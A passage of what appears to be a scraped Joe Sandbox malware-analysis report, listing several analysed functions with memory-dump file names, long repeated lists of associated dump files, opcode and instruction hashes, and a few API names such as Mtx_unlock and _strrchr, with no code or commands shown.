                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 305021d3025f122a9944bd746cf5fed1d4d7f95716fcd5cf899126414133aa62
                                                                                                                                                                    • Instruction ID: 6834c59f7d4970056cdb8daecc9ade8c1f2c949b645eeb0ea333dfa593a7263d
                                                                                                                                                                    • Opcode Fuzzy Hash: 305021d3025f122a9944bd746cf5fed1d4d7f95716fcd5cf899126414133aa62
                                                                                                                                                                    • Instruction Fuzzy Hash: 5711A723F30C295A675C816D8C172BAA5D2DBD824031F433AD826E7284E894DE13D290
                                                                                                                                                                    Function 00FF8860 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 69368e33383e1e94eef2ceab35efabe13634146fb6e6488aa9fcdc9ed388e530
                                                                                                                                                                    • Instruction ID: 19caba0876a3bd95dee1e8158dbc4d13a90a2d807309981c3190cf0f9e8445d6
                                                                                                                                                                    • Opcode Fuzzy Hash: 69368e33383e1e94eef2ceab35efabe13634146fb6e6488aa9fcdc9ed388e530
                                                                                                                                                                    • Instruction Fuzzy Hash: 48115B77A0118A43E6188A3DC8B46B7A795EFC53F17AC437AC3424B778CA22D843F600
                                                                                                                                                                    Function 00FEA302 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
                                                                                                                                                                    • Instruction ID: d9bd117f425f990dac9f41a0c28c208232ab19324aab2f8aa546bda1c19aa552
                                                                                                                                                                    • Opcode Fuzzy Hash: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
                                                                                                                                                                    • Instruction Fuzzy Hash: 70E08C32921268EBCB15DB99C90498AF3ECEB89B10B650096F601D3150C274EE00DBE1
                                                                                                                                                                    Function 00FB2EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 32384418-0
                                                                                                                                                                    • Opcode ID: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
                                                                                                                                                                    • Instruction ID: f5ee0a315b13735ce78b5442ae3d57aee6f27532b6768a99d802f446fa2a376d
                                                                                                                                                                    • Opcode Fuzzy Hash: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
                                                                                                                                                                    • Instruction Fuzzy Hash: 2BA1F371E41206AFDB10EF65CE45BAAB7A8FF14364F04812DE819D7241EB35EA04EBD1
                                                                                                                                                                    Function 00FECBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                    • String ID:
